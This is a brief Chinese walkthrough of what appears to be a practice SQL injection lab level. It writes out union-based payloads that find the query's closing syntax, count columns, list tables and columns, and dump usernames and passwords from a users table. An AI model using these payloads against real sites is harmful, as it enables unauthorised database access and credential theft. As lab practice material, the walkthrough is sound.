初始页面:
判断注入:?id=1, ?id=1', 这两个回显都正常,没有问题,再试?id=1"回显界面:
箭头方框的位置是:"1""),别看错,前面的 ' 是和后面的 LIMIT 0,1' 闭合的。
所以我们可以猜想语句然后拼接语句:select * from xxx where id=("$id")
所以我们的payload就是:?id=1")--+
猜解字段数payload:?id=-1") order by $number--+ ($number是数字变量)
当$number是4时:
所以字段数有3个,payload:?id=-1") union select 1,2,3--+
接下来就直接写payload就不截图了,前面的与一到三关一样,payload:
数据库名、用户:?id=-1") union select 1,database(),user()--+
表名:?id=-1") union select 1,2,group_concat(hex(table_name)) from information_schema.tables where table_schema=database()--+ security
列名:?id=-1") union select 1,2,group_concat(hex(column_name)) from information_schema.columns where table_name='users'--+
USER, CURRENT_CONNECTIONS, TOTAL_CONNECTIONS, id, username, password
查看username和password:?id=-1") union select 1,2,group_concat(username,0x3a,password) from users--+
就酱紫了!
